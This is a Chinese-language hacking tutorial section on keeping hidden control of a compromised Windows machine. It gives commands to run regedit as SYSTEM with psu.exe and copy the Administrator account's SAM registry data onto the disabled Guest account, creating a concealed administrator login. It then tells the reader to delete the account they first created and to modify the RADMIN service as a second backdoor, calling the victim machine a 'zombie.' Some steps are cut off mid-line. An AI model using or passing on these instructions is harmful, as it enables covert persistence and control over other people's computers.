十.使用被禁用的帐户[Guest]登陆,删除自己开始建的帐号
1.使用psu.exe展开注册表到
HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users
用法:[psu -p regedit -i pid]
Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值。
如:psu –p regedit –i 157
将Guest克成管理员权限,克成管理员权限的方法:
找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的类型值。
在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)。
导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相应的类型值的数据),然后删除Guest的配置。
2.查看计算机管理中帐户列表,刷新这时候会出现错误[找不到帐户](跳过这步也行)。
3.将Guest的配置(二个REG文件导进注册表)。
4.修改
5.实验被禁止的帐户Guest是否可用。
6.用Guest
整个过程结束。
最后最好把RADMIN的服务也改了,多留个后门多条路,呵呵。
整个过程全部结束,这机子就真正变成你的肉鸡了。